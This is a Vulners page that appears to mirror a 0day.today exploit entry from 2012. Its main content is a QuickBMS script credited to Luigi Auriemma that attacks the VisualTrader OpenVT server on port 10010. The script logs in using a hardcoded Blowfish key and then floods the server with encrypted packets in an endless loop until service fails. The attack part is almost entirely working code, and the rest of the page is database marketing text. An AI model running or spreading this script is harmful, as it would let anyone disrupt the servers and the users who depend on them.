Lucene search
+L

VisualTrader OpenVT lame Denial of Service

🗓️ 01 Jul 2012 00:00:00Reported by Luigi AuriemmaType 
zdt
 zdt
🔗 0day.today👁 29 Views

VisualTrader OpenVT lame Denial of Service. Quickbms script for openvt dos attack

Code
# VisualTrader OpenVT lame Denial of Service
# quickbms -n openvt_dos.bms "tcp://SERVER:10010" .
# script for Quickbms http://quickbms.aluigi.org

get SERVER fullname
set KEY string "3jds894jsnwmtod0295jdhbtr5bv789dsjkerk59fjq2k39fklwo04dm"

set MEMORY_FILE binary "10|full_program_name|username|password|"
callfunction OPENVT_SEND

# Denial of Service
for
    set MEMORY_FILE binary "1|1|1|program_exe|description|version|1"
    callfunction OPENVT_SEND
next

for
    callfunction OPENVT_RECV
next

startfunction OPENVT_SEND
    get SIZE asize MEMORY_FILE
    #goto 0 MEMORY_FILE
    #getdstring DATA SIZE MEMORY_FILE
    #print "SEND: %DATA%"
    math SIZE x= 8
    putvarchr MEMORY_FILE SIZE 0

    encryption bf_cbc KEY "" 1
    log MEMORY_FILE 0 SIZE MEMORY_FILE
    encryption "" ""

    string TMP p= "#%07x" SIZE
    putdstring TMP 8
    log SERVER 0 SIZE MEMORY_FILE
    put 0x0d byte
    put 0x0a byte
endfunction

startfunction OPENVT_RECV
    getdstring SIZE 8
    putvarchr SIZE 0 0x24
    getdstring DATA SIZE
    getdstring TMP 2
    encryption bf_cbc KEY ""
    string DATA E= DATA
    encryption "" ""
    strlen SIZE DATA
    print "RECV: %DATA%"
endfunction



#  0day.today [2018-01-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2012 00:00Current
7High risk
Vulners AI Score7
29